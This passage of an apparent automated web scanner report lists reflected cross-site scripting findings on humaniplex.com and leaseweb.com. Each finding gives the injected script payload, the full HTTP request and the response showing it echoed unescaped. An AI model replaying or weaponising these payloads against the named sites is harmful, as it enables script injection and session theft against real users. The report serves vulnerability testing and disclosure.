The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ff3a1'><script>alert(1)</script>bef842c1ec5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clubs/listff3a1'><script>alert(1)</script>bef842c1ec5 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.7.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:49 GMT; path=/; domain=.humaniplex.com
Content-Length: 4644
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head>


<title>
Humaniplex.com (HX) - The Social Network
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="htt
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/clubs/listff3a1'><script>alert(1)</script>bef842c1ec5'>
...[SNIP]...
4.61. http://www.humaniplex.com/clubs/list [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /clubs/list

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a3bdb'><script>alert(1)</script>78c80f6d488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clubs/list?a3bdb'><script>alert(1)</script>78c80f6d488=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.7.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:38 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25734


<html>
<head>


<title>
HX - Master Club List
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humaniplex.
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/clubs/list?a3bdb'><script>alert(1)</script>78c80f6d488=1'>
...[SNIP]...
4.62. http://www.humaniplex.com/flirts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /flirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4577f'><script>alert(1)</script>f119a4c3c72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flirts/?4577f'><script>alert(1)</script>f119a4c3c72=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.6.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:29 GMT; path=/; domain=.humaniplex.com
Content-Length: 5634
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head>


<title>
HX - Doing some Flirting?
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humanip
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/flirts/?4577f'><script>alert(1)</script>f119a4c3c72=1'>
...[SNIP]...
4.63. http://www.humaniplex.com/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d34d8'><script>alert(1)</script>9d998f23ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.html?d34d8'><script>alert(1)</script>9d998f23ed=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
Referer: http://www.humaniplex.com/tos/site.html?qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1s
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.1.10.1303159302; cookie_accepted_site_tos=1

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:41:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:41:17 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28534


<html>
<head>


<title>
Humaniplex.com (HX) - The Social Network
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="htt
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/index.html?d34d8'><script>alert(1)</script>9d998f23ed=1'>
...[SNIP]...
4.64. http://www.humaniplex.com/mingle [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /mingle

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65acc'><script>alert(1)</script>d61298a3855 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /mingle?65acc'><script>alert(1)</script>d61298a3855=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.5.10.1303159302

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:31 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:31 GMT; path=/; domain=.humaniplex.com
Content-Length: 5481
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head>


<title>
HX - Mingle!
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humaniplex.com/label
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/mingle/?65acc'><script>alert(1)</script>d61298a3855=1'>
...[SNIP]...
4.65. http://www.humaniplex.com/mingle/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /mingle/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8927'><script>alert(1)</script>7ffae16d95f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mingle/?a8927'><script>alert(1)</script>7ffae16d95f=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.5.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:26 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:26 GMT; path=/; domain=.humaniplex.com
Content-Length: 5481
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head>


<title>
HX - Mingle!
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humaniplex.com/label
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/mingle/?a8927'><script>alert(1)</script>7ffae16d95f=1'>
...[SNIP]...
4.66. http://www.humaniplex.com/profiles/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /profiles/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f84fa'><script>alert(1)</script>5b0a33ae281 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /profiles/?f84fa'><script>alert(1)</script>5b0a33ae281=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.4.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:44:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:44:05 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60476


<html>
<head>


<title>
HX - Recently Updated Profiles
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.hu
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/profiles/?f84fa'><script>alert(1)</script>5b0a33ae281=1'>
...[SNIP]...
4.67. http://www.humaniplex.com/tos/site.html [qs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /tos/site.html

Issue detail

The value of the qs request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1547"%3balert(1)//7a625e9c18e was submitted in the qs parameter. This input was echoed as d1547";alert(1)//7a625e9c18e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tos/site.html?qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1sd1547"%3balert(1)//7a625e9c18e HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:41:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:41:23 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18566

       <noscript><meta http-equiv='refresh' content='0; http://www.humaniplex.com/jscs.html?hj=n&ru=http://www.humaniplex.com/tos/site.html?qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1sd1547";alert(1
...[SNIP]...
<script type="text/javascript">
           window.location = "http://www.humaniplex.com/jscs.html?hj=y&ru=http://www.humaniplex.com/tos/site.html?qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1sd1547";alert(1)//7a625e9c18e"
       </script>
...[SNIP]...
4.68. http://www.humaniplex.com/tos/site.html [qs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /tos/site.html

Issue detail

The value of the qs request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8840f'><script>alert(1)</script>597271a5404 was submitted in the qs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tos/site.html?qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1s8840f'><script>alert(1)</script>597271a5404 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
Referer: http://www.humaniplex.com/tos/site.html?qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1s
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; cookie_js=y

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:41:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:41:03 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18117


<html>
<head>


<title>
HX - Terms of Service
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humaniplex.
...[SNIP]...
<a href='http://www.humaniplex.com/tos/site.html?accepting_tos=1&qs=aHR0cDovL3d3dy5odW1hbmlwbGV4LmNvbS9pbmRleC5odG1s8840f'><script>alert(1)</script>597271a5404'>
...[SNIP]...
4.69. http://www.humaniplex.com/user_tools/forgot_password/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /user_tools/forgot_password/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4a388'><script>alert(1)</script>362c067777e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user_tools/forgot_password/?4a388'><script>alert(1)</script>362c067777e=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.3.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:22 GMT; path=/; domain=.humaniplex.com
Content-Length: 6667
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head>


<title>
HX - Password Assistance
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humanipl
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/user_tools/forgot_password/?4a388'><script>alert(1)</script>362c067777e=1'>
...[SNIP]...
4.70. http://www.humaniplex.com/user_tools/join/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /user_tools/join/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fef86'><script>alert(1)</script>18e63addf2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /user_tools/join/?fef86'><script>alert(1)</script>18e63addf2c=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.2.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:21 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11315


<html>
<head>


<title>
HX - Join the Humaniplex.com Community
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http:
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/user_tools/join/?fef86'><script>alert(1)</script>18e63addf2c=1'>
...[SNIP]...
4.71. http://www.leaseweb.com/en [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a21a"><script>alert(1)</script>e9b4983878a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en7a21a"><script>alert(1)</script>e9b4983878a HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:36:48 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en7a21a"><script>alert(1)</script>e9b4983878a">
...[SNIP]...
4.72. http://www.leaseweb.com/en/shopping-cart [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/shopping-cart

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 940ec"><script>alert(1)</script>2071b7b58a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en940ec"><script>alert(1)</script>2071b7b58a0/shopping-cart HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:36:23 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 14041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="nl">
<head>
<
...[SNIP]...
<a class="en_link" href="/en940ec"><script>alert(1)</script>2071b7b58a0/shopping-cart">
...[SNIP]...
4.73. http://www.leaseweb.com/en/shopping-cart [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaseweb.com
Path:   /en/shopping-cart

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1082"><script>alert(1)</script>57876b17905 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/shopping-cartd1082"><script>alert(1)</script>57876b17905 HTTP/1.1
Host: www.leaseweb.com
Proxy-Connection: keep-alive
Referer: http://www.leaseweb.com/en/vps/express-cloud/configurator/1314
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=da3c254c28d1d0bfc93ffe67079f7e6e; __utmz=155577636.1303148133.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=155577636.311874997.1303148133.1303148133.1303148133.1; __utmc=155577636; __utmb=155577636.8.10.1303148133

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Apr 2011 17:37:14 GMT
Server: Apache
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 13906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<
...[SNIP]...
<a class="en_link" href="/en/shopping-cartd1082"><script>alert(1)</script>57876b17905">
...[SNIP]...
